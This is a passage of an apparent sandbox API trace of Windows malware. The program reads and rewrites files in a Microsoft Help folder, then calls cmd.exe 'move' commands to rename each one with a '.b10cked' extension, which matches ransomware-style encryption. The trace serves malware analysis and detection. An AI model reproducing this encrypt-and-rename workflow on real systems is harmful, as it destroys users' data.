lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.580] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x35ca [0195.581] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.581] SetFilePointer (in: hFile=0x120, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x30e2 [0195.581] ReadFile (in: hFile=0x120, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0195.582] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0195.582] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0195.582] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x35ca [0195.582] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0195.583] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0195.583] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0195.583] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x35ca [0195.583] SetFilePointer (in: 
hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0195.583] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0195.583] ReadFile (in: hFile=0x120, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x1ae4, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x1ae4, lpOverlapped=0x0) returned 1 [0195.583] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0195.583] WriteFile (in: hFile=0x120, lpBuffer=0x1273a68*, nNumberOfBytesToWrite=0x1ae4, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesWritten=0x12ec1c*=0x1ae4, lpOverlapped=0x0) returned 1 [0195.584] SetFilePointer (in: hFile=0x120, lDistanceToMove=-6884, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x1ae6 [0195.584] ReadFile (in: hFile=0x120, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x1ae4, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x1ae4, lpOverlapped=0x0) returned 1 [0195.584] SetFilePointer (in: hFile=0x120, lDistanceToMove=-6884, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x1ae6 [0195.584] WriteFile (in: hFile=0x120, lpBuffer=0x1273a68*, nNumberOfBytesToWrite=0x1ae4, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesWritten=0x12ec1c*=0x1ae4, lpOverlapped=0x0) returned 1 [0195.589] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Hx_1033_MKWD_NamedURL.HxW", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, 
lpUsedDefaultChar=0x0) returned 25 [0195.589] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Hx_1033_MKWD_NamedURL.HxW", cchWideChar=25, lpMultiByteStr=0x132f75c, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Hx_1033_MKWD_NamedURL.HxW", lpUsedDefaultChar=0x0) returned 25 [0195.590] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x35ca [0195.590] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0195.590] CloseHandle (hObject=0x120) returned 1 [0195.591] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\Hx_1033_MKWD_NamedURL.HxW", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~2.HXW") returned 0x27 [0195.591] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\") returned 0x1b [0195.592] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~2.HXW\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\Hx_1033_MKWD_NamedURL.HxW.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y 
\"C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~2.HXW\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\Hx_1033_MKWD_NamedURL.HxW.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x120, dwProcessId=0x53c, dwThreadId=0xc20)) returned 1 [0195.620] CloseHandle (hObject=0x1b4) returned 1 [0195.620] CloseHandle (hObject=0x120) returned 1 [0195.620] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0195.620] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0195.620] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount1=34, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount2=34) returned 2 [0195.620] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0195.620] ReleaseMutex (hMutex=0xf8) returned 1 [0195.620] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0195.620] ReleaseMutex (hMutex=0xf8) returned 1 [0195.620] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0195.620] ReleaseMutex (hMutex=0xf8) returned 1 [0195.620] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0195.620] ReleaseMutex (hMutex=0xf8) returned 1 [0195.620] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\Hx_1033_MTOC_Hx.HxH" (normalized: "c:\\users\\all users\\microsoft help\\hx_1033_mtoc_hx.hxh"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0195.621] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.621] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, 
dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2766 [0195.621] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.621] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=25241006838) returned 1 [0195.621] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.621] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2766 [0195.621] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.621] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.621] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2766 [0195.621] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.621] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0195.621] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x2766 [0195.621] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0195.621] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, 
dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.621] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2766 [0195.621] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.621] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.621] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2766 [0195.622] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.622] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.622] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2766 [0195.622] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.622] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.622] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2766 [0195.622] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.622] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.622] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2766 [0195.622] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.622] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.622] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2766 [0195.622] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.622] SetFilePointer (in: hFile=0x120, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x227e [0195.622] ReadFile (in: hFile=0x120, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0195.623] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0195.623] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0195.623] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x2766 [0195.624] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: 
lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0195.624] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0195.624] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0195.624] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x2766 [0195.624] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0195.624] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0195.624] ReadFile (in: hFile=0x120, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x13b2, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x13b2, lpOverlapped=0x0) returned 1 [0195.624] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0195.624] WriteFile (in: hFile=0x120, lpBuffer=0x1273a68*, nNumberOfBytesToWrite=0x13b2, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesWritten=0x12ec1c*=0x13b2, lpOverlapped=0x0) returned 1 [0195.945] SetFilePointer (in: hFile=0x120, lDistanceToMove=-5042, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x13b4 [0195.945] ReadFile (in: hFile=0x120, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x13b2, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x13b2, lpOverlapped=0x0) returned 1 [0195.945] SetFilePointer (in: hFile=0x120, lDistanceToMove=-5042, 
lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x13b4 [0195.945] WriteFile (in: hFile=0x120, lpBuffer=0x1273a68*, nNumberOfBytesToWrite=0x13b2, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesWritten=0x12ec1c*=0x13b2, lpOverlapped=0x0) returned 1 [0195.949] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Hx_1033_MTOC_Hx.HxH", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0195.949] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Hx_1033_MTOC_Hx.HxH", cchWideChar=19, lpMultiByteStr=0x1328794, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Hx_1033_MTOC_Hx.HxH", lpUsedDefaultChar=0x0) returned 19 [0195.949] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x2766 [0195.949] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0195.949] CloseHandle (hObject=0x120) returned 1 [0195.950] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\Hx_1033_MTOC_Hx.HxH", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~1.HXH") returned 0x27 [0195.950] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\") returned 0x1b [0195.951] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~1.HXH\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\Hx_1033_MTOC_Hx.HxH.b10cked\"", 
lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~1.HXH\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\Hx_1033_MTOC_Hx.HxH.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xa70, dwThreadId=0xbd8)) returned 1 [0195.955] CloseHandle (hObject=0x1b4) returned 1 [0195.955] CloseHandle (hObject=0x120) returned 1 [0195.955] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0195.955] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0195.955] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount1=34, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount2=34) returned 2 [0195.955] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0195.955] ReleaseMutex (hMutex=0xf8) returned 1 [0195.955] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0195.955] ReleaseMutex (hMutex=0xf8) returned 1 [0195.955] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0195.955] ReleaseMutex (hMutex=0xf8) returned 1 [0195.956] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0195.956] ReleaseMutex (hMutex=0xf8) returned 1 [0195.956] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft 
Help\\Hx_1033_MValidator.HxD" (normalized: "c:\\users\\all users\\microsoft help\\hx_1033_mvalidator.hxd"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0195.956] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.956] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x25a2 [0195.956] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.956] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=25274514061) returned 1 [0195.956] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.956] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x25a2 [0195.956] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.956] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.956] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x25a2 [0195.956] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.956] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0195.956] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x25a2 [0195.956] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0195.956] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.956] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x25a2 [0195.956] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.956] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.957] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x25a2 [0195.957] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.957] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.957] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x25a2 [0195.957] 